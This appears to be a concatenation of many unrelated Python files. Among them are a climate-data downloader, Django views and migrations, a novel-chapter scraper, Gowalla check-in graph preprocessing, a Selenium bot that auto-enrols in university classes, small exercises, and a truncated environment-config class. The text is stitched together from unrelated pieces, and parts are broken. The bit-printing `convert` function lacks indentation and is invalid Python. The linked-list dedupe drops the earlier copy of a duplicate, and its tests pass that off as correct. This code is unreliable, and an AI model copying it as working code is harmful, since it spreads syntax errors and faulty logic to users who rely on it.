from bs4 import BeautifulSoup
import mechanize
import os
import pandas as pd
import urllib.parse
CATEGORIES = ['TAVG', 'TMAX', 'TMIN']
BERK_URL = 'http://berkeleyearth.lbl.gov/auto/Regional/{}/Text/'
DL_DIR = 'downloaded'
CCODES_PATH = 'sources/country-regional-codes.csv'
def dl_category(cat, br, lookup=None):
    """
    Download a category of data.
    Args:
        cat: Temperature data category (TAVG, TMAX, or TMIN).
        br: mechanize.Browser to run web requests through.
        lookup: Dictionary used for mapping country names to country codes
            when a country name does not have a country code mapping, or has
            multiple possible mappings.
    Returns:
        Updated lookup table.
    """
    cat_url = BERK_URL.format(cat)
    if lookup is None:
        lookup = {}
    # Request webpage with download links
    br.open(cat_url)
    resp = br.response()
    # Find all file paths on the page
    print('Fetching file paths...')
    soup = BeautifulSoup(resp.read(), features='lxml')
    trows = soup.find_all('tr')
    paths = []
    for tr in trows:
        # Take at most the first link in each table row; keep it only if .txt.
        # (BUGFIX: removed an unused `found` flag from the original.)
        for td in tr.find_all('td'):
            link = td.find('a')
            if link is not None:
                href = link['href']
                ext = os.path.splitext(href)[1]
                if ext == '.txt':
                    paths.append(href)
                break
    # Only include data files for countries
    print('Filtering for countries...')
    ccodes = pd.read_csv(CCODES_PATH, encoding='latin')
    valid_names = []
    for path in paths:
        # Extract name of region: the '-'-separated tokens before the category marker
        name = urllib.parse.unquote(path, encoding='latin')
        region = []
        for token in name.split('-'):
            if token.upper() == cat.upper():
                break
            else:
                region.append(token)
        region = ' '.join(region)
        # Search database for country name
        rows = ccodes[ccodes['name'].str.match(region, case=False)]
        num_rows = len(rows.index)
        if num_rows == 1:
            code = rows['alpha-3'].values.item()
            valid_names.append((code, path))
        else:
            # Check lookup table for unknown country code.
            # Then ask the user to specify a country code if the query
            # resulted in multiple options.
            key = region.lower()
            if key in lookup:
                valid_names.append((lookup[key], path))
            elif num_rows > 1:
                codes = rows['alpha-3'].values
                # BUGFIX: the original format string had one placeholder but
                # two arguments; the joined code list was silently dropped.
                print('"{}" has multiple matches:'.format(region))
                for i, c in enumerate(codes):
                    cname = rows['name'].values[i]
                    print(' ({}). {}, {}'.format(i, c, cname))
                num = input('Enter a number (or nothing to skip): ')
                if num.isdigit():
                    num = int(num)
                    if num >= 0 and num < len(codes):
                        code = codes[num]
                        valid_names.append((code, path))
                        # BUGFIX: only record a lookup entry when a code was
                        # actually chosen.  The original wrote `code` from a
                        # previous loop iteration (or raised NameError) when
                        # the user skipped or when num_rows == 0.
                        lookup[key] = code
                print()
    # BUGFIX: guard against an empty page to avoid ZeroDivisionError.
    per_rows = (len(valid_names) / len(paths) * 100) if paths else 0.0
    print('{}/{} ({:.02f}%) of rows used'.format(len(valid_names), len(paths), per_rows))
    # Download data for each valid country
    if not os.path.exists(DL_DIR):
        os.mkdir(DL_DIR)
    for i, (code, name) in enumerate(valid_names):
        url = urllib.parse.urljoin(cat_url, name)
        br.open(url)
        resp = br.response()
        out_path = os.path.join(DL_DIR, '{}-{}.txt'.format(code, cat))
        if (i + 1) % 50 == 0:
            print('{}/{} files written'.format(i + 1, len(valid_names)))
        with open(out_path, 'wb') as f:
            f.write(resp.read())
    print('All files downloaded for {}'.format(cat))
    return lookup
if __name__ == '__main__':
    # Open virtual browser
    br = mechanize.Browser()
    # Download data for each category; the lookup table is threaded through
    # so user-entered country-code choices are reused across categories.
    lookup = None
    for cat in CATEGORIES:
        print('Downloading data for {}...'.format(cat))
        lookup = dl_category(cat, br, lookup)
        print()
|
# Remove Dups: Write code to remove duplicates from an unsorted linked list. Follow-up: how would you solve this problem is a temporary buffer is not allowed?
from LinkedList import LinkedList, Node
def remove_dups(a: LinkedList) -> LinkedList:
    """Remove duplicate values from linked list `a` in place and return it.

    Pass 1 records each value's first sighting and queues one removal per
    extra sighting.  Pass 2 walks from the head and unlinks the first
    node(s) whose *successor* carries a queued value — the head node itself
    is never unlinked, so for an interior duplicate pair it is the earlier
    copy that gets dropped and a later occurrence that survives (e.g.
    [1, 2, 3, 2, 5] becomes [1, 3, 2, 5]).
    """
    # Pass 1: collect values to drop (one queued entry per extra occurrence).
    first_seen = []
    to_drop = []
    node = a.head
    while node is not None:
        if node.data in first_seen:
            to_drop.append(node.data)
        else:
            first_seen.append(node.data)
        node = node.next
    # Pass 2: unlink from the head forwards; stay on the same node after an
    # unlink so consecutive duplicates are all caught.
    node = a.head
    while node is not None:
        successor = node.next
        if successor and successor.data in to_drop:
            to_drop.remove(successor.data)
            node.next = successor.next  # splice the successor out
        else:
            node = successor
    return a
# Though the object references differ (each expected list is freshly built),
# the string representations should be identical.
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 4, 5]))) == str(
    LinkedList(nodes=[1, 2, 3, 4, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 1, 3, 4, 5]))) == str(
    LinkedList(nodes=[1, 3, 4, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 5, 5]))) == str(
    LinkedList(nodes=[1, 2, 3, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 2, 2, 2, 5]))) == str(
    LinkedList(nodes=[1, 2, 5])
)
# NOTE: for an interior duplicate pair the EARLIER copy is removed,
# so the surviving 2 is the one at the original fourth position.
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 2, 5]))) == str(
    LinkedList(nodes=[1, 3, 2, 5])
)
|
'''
Created on 2013-11-12
@author: Administrator
'''
from django.http import HttpResponse
from django.template import Context,loader
from poll.models import User
from django.shortcuts import render
from mydg.Count import Count
# Module-level side effect: one shared Count instance created at import time.
# The prints trace import order during debugging (Python 2 syntax).
print '--------------1'
my_count=Count()
print '--------------2'
def index(request):
    """Render poll/index.html with all User rows and the shared request count."""
    #return HttpResponse("index")
    latest_poll_list=User.objects.all()
    '''
    template=loader.get_template('poll/index.html')
    context=Context({
        'latest_poll_list':latest_poll_list,})
    return HttpResponse(template.render(context))
    '''
    #from mydg.wsgi import my_count
    print '----------------poll/index'
    # `my_count` is the module-level Count instance created at import time.
    context={'latest_poll_list':latest_poll_list,'count':my_count.count}
    return render(request,'poll/index.html',context)
def detail(request,poll_id):
    """Detail view stub for poll `poll_id`.

    NOTE(review): the try/except scaffolding is a placeholder — `pass` cannot
    raise, so the bare `except` / Http404 path is currently unreachable;
    presumably a poll lookup belongs in the `try` body.
    """
    from django.http import Http404
    try:
        pass
    except:
        raise Http404
    return HttpResponse("You are looking at detail p0ll %s" % poll_id)
def results(request,poll_id):
    """Render a plain-text placeholder for the results page of poll `poll_id`."""
    message = "You are looking at p0ll results %s" % poll_id
    return HttpResponse(message)
|
from math import *
# Interactive calculator (prompts in French): read two integers and an
# operator, then print the result of the chosen operation.
a = int(input("entrer la valeur de l’entier a: "))
b = int(input("entrer la valeur de l’entier b: "))
signe = str(input("Veuillez choisir un opérateur parmi les suivants + ou - ou * ou /: "))
if signe == "+":
    result = a + b
    print("Le résultat de l’opération est :", result)
elif signe == "-":
    result = a - b
    print("Le résultat de l’opération est :", result)
elif signe == "*":
    result = a * b
    print("Le résultat de l’opération est :", result)
else:
    # NOTE(review): any unrecognized operator falls through to truncated
    # integer division, and b == 0 raises ZeroDivisionError — confirm whether
    # validation is wanted here.
    result = int(a / b)
    print("Le résultat de l’opération est :", result)
|
# Generated by Django 3.1.1 on 2020-10-17 09:20
from django.db import migrations
class Migration(migrations.Migration):
    """Remove four fields (condition, offerdes, offertitle, ofimage) from the
    ``offers`` model.  Auto-generated by Django 3.1.1."""
    dependencies = [
        ('hotelpackages', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='offers',
            name='condition',
        ),
        migrations.RemoveField(
            model_name='offers',
            name='offerdes',
        ),
        migrations.RemoveField(
            model_name='offers',
            name='offertitle',
        ),
        migrations.RemoveField(
            model_name='offers',
            name='ofimage',
        ),
    ]
|
from instance import *
from API.LaoMaoxsAPI import Download
from API import UrlConstants
class BOOK:
    """Novel downloader: wraps one book's API response and drives chapter downloads.

    BOOK_INFO is the decoded API payload; expected keys (per the accesses
    below): 'msg', 'code', and 'data' with book_id/book_title/book_desc/
    book_author/chapter_list/update_time/book_type/book_status.
    """
    def __init__(self, BOOK_INFO):
        self.book_info = BOOK_INFO
        self.book_info_msg = BOOK_INFO.get('msg')
        self.book_info_code = BOOK_INFO.get('code')
        self.book_info_data = self.book_info.get('data')
        # Directories come from the global config (Vars.cfg).
        self.save_dir = Vars.cfg.data.get('save_dir')
        self.output_dir = Vars.cfg.data.get('output_dir')
        self.book_info_data_list = []
    def config_bookname(self):
        """List already-downloaded chapter files under config/<bookName>."""
        return os.listdir(os.path.join('config', self.bookName))
    def get_book_info(self):
        """Populate book attributes from the payload; True on success ('msg' == 'ok')."""
        if self.book_info_msg == 'ok':
            self.bookid = self.book_info_data.get('book_id')
            self.bookName = self.book_info_data.get('book_title')
            self.novel_intro = self.book_info_data.get('book_desc')
            self.authorName = self.book_info_data.get('book_author')
            self.chapter_list = self.book_info_data.get('chapter_list')
            # update_time is an epoch timestamp; render as "YYYY-MM-DD HH:MM:SS".
            self.lastUpdateTime = time.localtime(self.book_info_data.get('update_time'))
            self.lastUpdateTime = time.strftime("%Y-%m-%d %H:%M:%S",self.lastUpdateTime)
            self.book_type = self.book_info_data.get('book_type')
            self.isFinish = self.book_info_data.get('book_status')
            self.book_info_data_list.append(self.book_info_data)
            return True
        else:
            return False
    def book_show(self):
        """Print book metadata, prepare folders, and start the threaded download."""
        if self.get_book_info():
            show_intro = "\n\n书名:{}\n序号:{}\n作者:{}\n分类:{}\n更新:{}".format(
                self.bookName, self.bookid, self.authorName,
                self.book_type, self.lastUpdateTime)
            print(show_intro)
            show_intro += "简介:{}\n".format(self.novel_intro)
            """Create the folders and files."""
            self.os_file()
            Download().ThreadPool(self.chapters(), self.book_info_data_list)
        else:
            # NOTE(review): bare expression is a no-op — presumably this was
            # meant to print/log the error message.
            self.book_info_msg
    def chapters(self):
        """Build the list of chapter-content URLs still to be downloaded."""
        chapters_list = []
        config_bookname = self.config_bookname()
        for chapter_id_num, chapter_id in enumerate(range(len(self.chapter_list))):
            """Skip chapters that have already been downloaded."""
            chapter_title = self.chapter_list[chapter_id_num]
            if del_title(chapter_title) in ''.join(config_bookname):
                # if self.chapter_list[chapter_id_num] in ''.join(self.config_bookname()):
                #     print(self.chapter_list[chapter_id_num], '已经下载过')
                continue
            url_num = int(int(self.bookid)/1000) # book number equals bookid / 1000
            chapters_list.append(UrlConstants.CHAP_CONTENT.format(url_num, self.bookid, chapter_id))
        if len(chapters_list) == 0:
            print("没有需要下载的章节")
        else:
            print('开始下载 {} ,一共剩余{}章'.format(self.bookName, len(chapters_list)))
        return chapters_list
        # single-threaded variant (kept for reference):
        # for chapter_id_num, chapter_id in enumerate(track(range(len(self.chapter_list)))):
        #     url_num = int(int(self.bookid)/1000) # 书本编号等于bookid÷1000
        #     book_title = self.chapter_list[chapter_id_num]
        #     """跳过已经下载的章节"""
        #     if self.chapter_list[chapter_id_num] in ''.join(self.config_bookname()):
        #         print(self.chapter_list[chapter_id_num], '已经下载过')
        #         continue
        #     url = self.chapterurl.format(url_num, self.bookid, chapter_id)
        #     content = self.getUtil(url)['data']
        #     """跳过屏蔽章节"""
        #     if "\\n\\n    编辑正在手打中,稍后点击右上角刷新当前章节!" not in content:
        #         print(book_title)
        #         content_title = "\n\n{}\n{}".format(book_title, content_(content))
        #         self.write_txt(content_title, book_title, chapter_id_num)
        #     else:
        #         print(f"{self.chapter_list[chapter_id_num]}这是屏蔽章节,跳过下载")
        # with open(os.path.join("Download", self.bookName + '.txt'), 'w', encoding='utf-8') as f:
        #     self.filedir()
        # print(f'\n小说 {self.bookName} 下载完成')
    def os_file(self):
        """Ensure the output dir, save dir, and per-book save folder all exist."""
        self.main_path = os.getcwd() # project root path
        # create the output (Download) folder
        if not os.path.exists(self.output_dir):
            os.mkdir(self.output_dir)
            print(f'已在{self.main_path}创建{self.output_dir}文件夹')
        # create the config folder
        if not os.path.exists(self.save_dir):
            os.mkdir(self.save_dir)
            print(f'已在{self.main_path}创建{self.save_dir}文件夹')
        if not os.path.exists(os.path.join(self.save_dir, self.bookName)):
            os.makedirs(os.path.join(self.save_dir, self.bookName))
|
'''
gow pre-process:
implement of merged gowalla data to spatial-temporal graph
'''
import time
import random
import pickle
import numpy as np
import pandas as pd
import networkx as nx
from tqdm import tqdm
from units import get_distance_hav
import warnings
warnings.filterwarnings("ignore")
# Show full frames when printing (debug convenience).
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
pd.set_option('max_colwidth', 100)
# Only these location categories are converted to graphs.
cates = ['Coffee Shop', 'Sandwich Shop', 'Theatre']
gowalla_graph_num = np.zeros(700)
P = 0.01 # for calculating threshold
# Geohash base-32 alphabet; geo_dict maps each character to its index 0..31.
ghash_code_index = 'bcfguvyz89destwx2367kmqr0145hjnp'
geo_dict = dict(zip(ghash_code_index, range(32)))
friend_path = '../other_data/gowalla/gowalla_friendship.csv'
# Save path
sub_net_path = 'spatio-temporal net/gowalla/sub_net_'
n_feat_path = 'spatio-temporal net/gowalla/n_feat_'
e_feat_path = 'spatio-temporal net/gowalla/e_feat_'
label_path = 'spatio-temporal net/gowalla/label_'
def net_complete(): # Read the data and call other functional functions for processing
    """Build one spatio-temporal graph per target category from merged Gowalla data.

    For each category in `cates`: slice its rows out of the merged frame,
    subsample up to 500k records, dedupe, sort by geohash, derive 10 time-bin
    boundaries, then hand off to Static_graph / sub_net_sampling.
    """
    data_path = 'data_sort_by_cate.pkl' # the data sorted by category after merging data
    merged_data = pd.read_pickle(data_path)
    merged_data = merged_data[['userid', 'lng', 'lat', 't', 'geo']]
    with open("spot_dict.pkl", 'rb') as f:
        spot_id_dict = pickle.load(f) # The category corresponds to the number of rows that first appear
    cate_keys = list(spot_id_dict.keys())
    row_num = list(spot_id_dict.values())
    for (index, key) in zip(range(len(cate_keys)), cate_keys):
        if key not in cates:
            continue
        # Per-category output paths, bundled for sub_net_sampling.
        cate_sub_net_path = sub_net_path + str(index) + '.pkl'
        cate_n_feat_path = n_feat_path + str(index) + '.pkl'
        cate_e_feat_path = e_feat_path + str(index) + '.pkl'
        cate_label_path = label_path + str(index) + '.pkl'
        cate_save_path = [cate_sub_net_path, cate_n_feat_path, cate_e_feat_path, cate_label_path]
        # This category's rows run until the next category's first row.
        if index == len(cate_keys) - 1:
            raw_data = merged_data.iloc[row_num[index][1]:]
        else:
            raw_data = merged_data.iloc[row_num[index][1]:row_num[index + 1][1]]
        random.seed(30)
        chosen = np.sort(random.sample(range(len(raw_data)), min(500000, len(raw_data))))
        raw_data = raw_data.iloc[chosen]
        pro_data = raw_data.drop_duplicates(keep='first') # Remove duplicated records
        pro_data.sort_values(by="geo", inplace=True)
        pro_data = pro_data.reset_index().iloc[:, 1:]
        time_attr = pro_data['t']
        t_min = time_attr.min()
        t_max = time_attr.max()
        # 10 equal time bins between earliest and latest check-in (drop the left edge).
        time_index = []
        for j in np.linspace(t_min, t_max, 11):
            # BUGFIX: np.float was removed in NumPy 1.24 — use the builtin float.
            time_index.append(float(j))
        time_index.remove(time_index[0])
        print('read done:{}'.format(index))
        print('num of record lines:{}'.format(len(pro_data)))
        # BUGFIX: np.str was removed in NumPy 1.24 — use the builtin str.
        pro_data = np.array(pro_data.values).astype(str)
        one_cate = Static_graph(pro_data)
        sub_net_sampling(one_cate, time_index, cate_save_path, index)
def Static_graph(pro_data):
    """
    :param pro_data: All Check records under the same location category (gowalla )
    :return: G(networkx graph),time,gps

    Builds a directed check-in graph: nodes are check-in records; for a random
    35% of each user's friends, edges connect the pair's check-ins, directed
    from the earlier check-in to the later one and weighted by haversine
    distance.
    """
    friend_ship = pd.read_csv(friend_path)
    friend_ship = np.array(friend_ship.values)  # convert to a numpy array
    g_tmp = nx.Graph()
    g_tmp.add_edges_from(friend_ship)
    # Column layout of pro_data: userid, lng, lat, t, geo (as strings).
    # BUGFIX: np.float was removed in NumPy 1.24 — use the builtin float.
    user_id = list(pro_data[:, 0].astype(float))
    gps = list(pro_data[:, [2, 1]].astype(float))
    time = list(pro_data[:, -2].astype(float))
    geo = list(pro_data[:, -1])
    new_g_tmp = g_tmp.subgraph(user_id)
    G = nx.DiGraph()
    G.add_nodes_from(range(len(user_id)))
    # transformed user name into an ID, record the corresponding check-in node
    ud2rc = {} # user_id to record(node)
    for (index, u) in zip(range(len(user_id)), user_id):
        ud2rc.setdefault(u, []).append(index)
    for u1 in tqdm(new_g_tmp.nodes()):
        ner = list(new_g_tmp.neighbors(u1))
        # Randomly select 35% of friends
        # (https://www.businessinsider.com/35-percent-of-friends-see-your-facebook-posts-2013-8)
        for u2 in random.sample(ner, int(0.35 * len(ner))):
            for node1 in ud2rc[u1]:
                for node2 in ud2rc[u2]:
                    d = get_distance_hav(gps[node1], gps[node2])
                    # Direct the edge from the earlier check-in to the later one.
                    if time[node1] > time[node2]:
                        G.add_edge(node2, node1, weight=d)
                    else:
                        G.add_edge(node1, node2, weight=d)
    print('Static Graph, node nums:{}, edge nums:{}'.format(G.number_of_nodes(), G.number_of_edges()))
    return G, time, geo
def sub_net_sampling(args, time_index, save_path, cate_index):
    # Converts a category's data into a spatial-temporal graph
    """Sample per-node spatio-temporal sub-graph sequences and pickle them.

    :param args: (graph, times, geo) triple as returned by Static_graph
    :param time_index: upper bounds of the time bins (caller removed the
        first of 11 linspace points, leaving 10 bins)
    :param save_path: four pickle paths: [graphs, node feats, edge feats, labels]
    :param cate_index: category index (unused inside this function)
    """
    net = args[0]
    nodes_all = list(net.nodes)
    time = np.array(args[1])
    geo = np.array(args[2])
    node_num = len(nodes_all)
    sub_net = []
    node_feature = []
    edge_feature = []
    label = []
    random.seed(23)  # fixed seed so the sampled node set is reproducible
    # NOTE(review): random.sample() requires a sequence on Python >= 3.11;
    # net.nodes() is a view, so this line breaks there -- confirm target version.
    chosen = np.sort(random.sample(net.nodes(), min(20000, int(node_num))))
    # chosen = nodes_all
    dup_dict = {}
    net_index = 0
    for i in tqdm(chosen):  # one sub-graph centred on i, expanded into K sequential sub-graphs
        if geo[i] in dup_dict.keys():
            continue
        nodes = list(range(max(0, i-1000), min(i+1000, node_num)))
        for j in reversed(nodes):  # drop nodes that fail the geo-location condition
            # Records are grouped by the 5-character geohash prefix of the centre.
            if geo[j][:5] != geo[i][:5]:
                nodes.remove(j)
        dup_dict.setdefault(geo[i], []).append(net_index)
        net_index += 1
        sequence_net = []
        sequence_feature = []
        sequence_edge = []
        sequence_label = []
        for j in range(len(time_index)):  # get rid of the points that don't satisfy the time condition
            sub_nodes = nodes.copy()
            for t in reversed(sub_nodes):
                # Keep only check-ins inside time bin j: (time_index[j-1], time_index[j]].
                if time[t] > time_index[j] or (time[t] < time_index[j-1] if j != 0 else False):
                    sub_nodes.remove(t)
            one_period_label = np.zeros(32)
            one_period_feature = np.zeros((len(sub_nodes), 32))
            for index, t in enumerate(sub_nodes):
                if j == len(time_index) - 1:
                    # The last bin doubles as the prediction target counts.
                    one_period_label[geo_dict[geo[t][-1]]] += 1
                # One-hot feature keyed by the record's last geohash character.
                one_period_feature[index, geo_dict[geo[t][-1]]] = 1
            one_period_net = net.subgraph(sub_nodes)
            # Relabel nodes to 0..N-1 so downstream tensors line up.
            mapping = dict(zip(one_period_net, range(len(one_period_net.nodes()))))
            one_period_net = nx.relabel_nodes(one_period_net, mapping)
            # get d (edge feature)
            attr_tmp = list(one_period_net.edges.values())
            attr_tmp = np.array([x['weight'] for x in attr_tmp])
            if len(attr_tmp) > 0:
                attr_min = attr_tmp.min()
                attr_max = attr_tmp.max()
                if attr_max != 0:
                    # NOTE(review): looks like leftover debug output -- confirm
                    # this print is intentional before removing it.
                    print(attr_max)
                # Min-max normalise the edge weights, guarding a zero range.
                attr_tmp = [(x - attr_min) / ((attr_max - attr_min) if (attr_max - attr_min) else 1) for x in attr_tmp]
            sequence_edge.append(attr_tmp)
            # get net and feature
            sequence_net.append(one_period_net)
            sequence_feature.append(one_period_feature)
            # get label
            if j == len(time_index) - 1:  # Record the last for the tag
                # A cell is "hot" when its count clears the P-interpolated threshold.
                thr = one_period_label.mean() + \
                    (one_period_label.max() - one_period_label.mean()) * P
                thr = max(thr, 1)
                one_period_label = np.int64(one_period_label >= thr)
                sequence_label.append(one_period_label)
        sub_net.append(sequence_net)
        node_feature.append(sequence_feature)
        edge_feature.append(sequence_edge)
        label.append(sequence_label[0])
    print('dup dict len:', len(dup_dict.values()))
    if len(sub_net) != 0:
        print('st-graphs num:{}, node_feat_list:{}, '
              '\n edge_feat_list:{}, label_list:{}'.format(len(sub_net), len(node_feature), len(edge_feature), len(label)))
        with open(save_path[0], 'wb') as f:
            pickle.dump(sub_net, f)
        with open(save_path[1], 'wb') as f:
            pickle.dump(node_feature, f)
        with open(save_path[2], 'wb') as f:
            pickle.dump(edge_feature, f)
        with open(save_path[3], 'wb') as f:
            pickle.dump(label, f)
def main():
    """Entry point: run the whole preprocessing pipeline, then report."""
    net_complete()
    print('done')


if __name__ == '__main__':
    main()
|
from django.db import models
from django.contrib.auth.models import AbstractUser
class MyCustomUser(AbstractUser):
    """Custom user model based on Django's AbstractUser.

    NOTE(review): AbstractUser already defines first_name/last_name with
    max_length=150; these overrides shrink the limit to 25 characters --
    confirm the tighter limit is intentional.
    """
    # Overrides of the inherited name fields with a shorter max length.
    first_name = models.CharField(max_length=25)
    last_name = models.CharField(max_length=25)
|
"""added encode_commands flag
Revision ID: eef5682e45eb
Revises: c789ecdb563c
Create Date: 2017-04-12 15:51:49.935504
"""
# revision identifiers, used by Alembic.
revision = 'eef5682e45eb'
down_revision = 'c789ecdb563c'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the nullable boolean ``encode_commands`` column to ``sites``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('sites', sa.Column('encode_commands', sa.Boolean(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Drop the ``encode_commands`` column from ``sites``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('sites', 'encode_commands')
    ### end Alembic commands ###
"""
integer is 4byte or 32 bits
This works for negative numbers too!
"""
def convert(n):
i = 31
while i >= 0:
k = n >> i
if k & 1 > 0:
print("1",end="")
else:
print("0",end="")
i -= 1
# Demo: print the 32-bit binary representation of a few small integers.
# (The scratch notes previously here described an unrelated masking
# experiment, not the calls below.)
convert(4)
print()
convert(2)
print()
convert(2)
print()
print("========================================================")
convert(6)
print()
convert(3)
print()
convert(2)
|
class Solution:
    def check(self, nums: List[int]) -> bool:
        """Return True if nums is a non-decreasing array rotated >= 0 times.

        A circular array is a rotation of a sorted (non-decreasing) array
        exactly when it has at most one "descent": a position whose element
        is strictly greater than its circular successor.
        """
        size = len(nums)
        descents = 0
        for i in range(size):
            if nums[i] > nums[(i + 1) % size]:
                descents += 1
        return descents <= 1
|
import sys
import time
from URLS import Base
import mail_stuff
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
# CSS selector for the "Register: add/drop classes" entry buried in the
# deeply nested PeopleSoft menu tables.
register_add_drop ='#PG_MYMENU_HMPG_Data > div >\
table > tbody > tr:nth-child(1) > td > table > tbody > tr:nth-child(6) >\
td > table > tbody > tr:nth-child(2) > td:nth-child(3) > table > tbody >\
tr:nth-child(2) > td > table > tbody > tr:nth-child(7) > td:nth-child(2) > a'
# Becomes True once a watched class is no longer CLOSED.
flag = False
# Log in using credentials from URLS.Base.
browser = webdriver.Chrome()
browser.get(Base.url)
browser.find_element_by_id('userid').send_keys(Base.uid)
browser.find_element_by_id('pwd').send_keys(Base.pwd + Keys.RETURN)
try:
    element = WebDriverWait(browser, 10).until(
        EC.visibility_of_element_located((By.CSS_SELECTOR, register_add_drop)))
    element.click()
except TimeoutException:
    print('failed')
    browser.close()
    sys.exit(0)
# The enrollment page lives inside an iframe.
# NOTE(review): switch_to_frame and find_element_by_* were removed in
# Selenium 4 -- confirm the pinned selenium version still provides them.
browser.switch_to_frame(browser.find_element_by_xpath('//*[@id="ptifrmcontent"]/div/iframe'))
while not flag:
    # add classes button to refresh
    browser.find_element_by_xpath('//*[@id="win0divDERIVED_SSTSNAV_SSTS_NAV_SUBTABS"]/div/table/tbody/tr[2]/td[5]/a').click()
    # get contents of shopping cart:
    entries = browser.find_elements_by_xpath('//*[@id="SSR_REGFORM_VW$scroll$0"]/tbody/tr')  # grabs table
    # for i in range(2,len(entries)): # 2 because first 2 rows are rubbish
    #     entries[i].click()
    for i in range(0,len(entries)-2):
        status = browser.find_element_by_xpath('//*[@id="win0divDERIVED_REGFRM1_SSR_STATUS_LONG${}"]/div/img'.format(i))
        status.click()
        # A status image without CLOSED in its src means a seat opened up.
        if 'CLOSED' not in status.get_attribute("src"):
            flag = True
            mail_stuff.send_mail()
            #proceed to step 2 of 3 button
            browser.find_element_by_id('DERIVED_REGFRM1_LINK_ADD_ENRL$82$').click()
            try:
                element = WebDriverWait(browser, 10).until(
                    EC.visibility_of_element_located((By.ID, 'DERIVED_REGFRM1_SSR_PB_SUBMIT')))
                element.click()
            except TimeoutException:
                print('failed')
                browser.close()
                sys.exit(0)
            # get into next iframe again -- NOT NEEDED
            # browser.switch_to_frame(browser.find_element_by_xpath('//*[@id="ptifrmtgtframe"]'))
            # finish !
            # browser.find_element_by_id('DERIVED_REGFRM1_SSR_PB_SUBMIT').click()
            browser.close()
            sys.exit()
    # search button
    browser.find_element_by_id('DERIVED_REGFRM1_SSR_PB_SRCH').click()
    # return to shopping cart
    browser.find_element_by_xpath('//*[@id="CLASS_SRCH_WRK2_SSR_PB_CLOSE"]').click()
''' START BROWSER METHODS:
find_element
find_element_by_id
find_element_by_name
find_element_by_tag_name
find_element_by_class_name
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_css_selector
find_element_by_xpath
find_elements
find_elements_by_id
find_elements_by_name
find_elements_by_tag_name
find_elements_by_class_name
find_elements_by_link_text
find_elements_by_partial_link_text
find_elements_by_css_selector
find_elements_by_xpath
current_url
get_cookies
set_window_size
error_handler
close
set_page_load_timeout
delete_cookie
get_screenshot_as_file
desired_capabilities
maximize_window
page_source
execute_async_script
set_window_position
switch_to_frame
add_cookie
_switch_to
window_handles
start_client
log_types
delete_all_cookies
execute
set_script_timeout
get_window_size
get_cookie
orientation
get_screenshot_as_png
switch_to_window
get_window_position
switch_to_active_element
_is_remote
execute_script
command_executor
_wrap_value
file_detector
service
switch_to_alert
get
_file_detector
capabilities
refresh
mobile
forward
create_web_element
application_cache
create_options
file_detector_context
session_id
back
quit
launch_app
stop_client
current_window_handle
start_session
switch_to
save_screenshot
name
get_screenshot_as_base64
title
w3c
implicitly_wait
get_log
_unwrap_value
_web_element_cls
_mobile
switch_to_default_content
END BROWSER METHODS: ''' |
#!/usr/bin/env python
# coding: utf-8

"""Count the sausages lying on a pizza's crust.

Input format (space-separated integers):
    R D N  x1 y1 r1  x2 y2 r2  ...
where R is the pizza radius, D the crust width, N the sausage count,
followed by N (x, y, r) triples.

Fix: in the original notebook export, ``distance`` was defined in a
later cell than its first use, so running the file as a script raised
NameError. The helper is now defined before it is called.
"""

from math import sqrt


def distance(x, y):
    """Distance from point (x, y) to the pizza centre at the origin."""
    return sqrt((x * x) + (y * y))


def count_crust_sausages(values):
    """Return how many sausages lie on the crust.

    ``values`` is the parsed integer list described in the module
    docstring. A sausage counts when its inner edge (dist - r) is beyond
    the inner crust boundary (R - D) but still inside the pizza (< R).
    NOTE(review): the outer edge (dist + r) is never checked, so a
    sausage overhanging the rim is still counted -- confirm against the
    problem statement.
    """
    R = values[0]
    D = values[1]
    count = 0
    # values[2] is the sausage count; (x, y, r) triples start at index 3.
    for i in range(3, len(values) - 2, 3):
        x = values[i]
        y = values[i + 1]
        r = values[i + 2]
        dist = distance(x, y)
        if ((dist - r) > (R - D)) and ((dist - r) < R):
            count += 1
    return count


# actualInput = "8 4 7 7 8 1 -7 3 2 0 2 1 0 -2 2 -3 -3 1 0 6 2 5 3 1"
actualInput = "10 8 4 0 0 9 0 0 10 1 0 1 1 0 2"  # input from user as a string
inputString = [int(num) for num in actualInput.split(" ")]
print(count_crust_sausages(inputString))  # number of sausages on the crust
|
# ########### 说明 ########## #
# 这是接入方处理环境的入口文件,需要将环境信息在这里进行标准化,方便 base_class 类中,对环境信息进行获取。
# 需要注意的是必须保留三个方法: get_env_list、get_mysql_option、get_application_host
# 对于新扩展的环境信息配置请单独编写 get方法,并在base_class中调用
# 建议的配置获取方案:
# ############################ #
class EnvRouter():
    """Integration entry point that normalises environment information.

    Three methods are mandatory and referenced by the base plumbing:
    get_env_list, get_mysql_option, get_application_host. Add a separate
    get method for each newly extended piece of environment config.
    """
    # ################### Custom code area ################### #
    def __init__(self):
        """
        Obtain the configuration object.
        Standard dict structure for database configuration.
        todo: developers must complete this according to the test
        environments of their own organisation.
        """
        pass

    def get_env_list(self):
        """
        todo: return all environment names; developers must complete this
        according to the test environments of their organisation.
        """
        return ['env1', 'env2']

    def get_option_demo(self, env_name, param1):
        """
        Demo code for fetching a configuration value.
        """
        if True:  # placeholder branch -- replace with a real lookup
            return '获取配置内容'
        else:
            raise Exception("【{}】环境的XX【{}】demo配置不存在".format(env_name, param1))
    # ################### Custom code area END ################### #

    # The methods below are fixed and must not be removed: they are
    # already referenced by the base-class plumbing.
    def get_mysql_option(self, env_name, database_name):
        """
        Return the mysql_option configuration for environment ``env_name``
        and database ``database_name`` as (ok, config_or_error_message).
        """
        print(env_name, database_name)
        if True:  # placeholder branch -- replace with a real lookup
            return True, {
                "host": "0.0.0.0",
                "port": "3301",
                "user": "user",
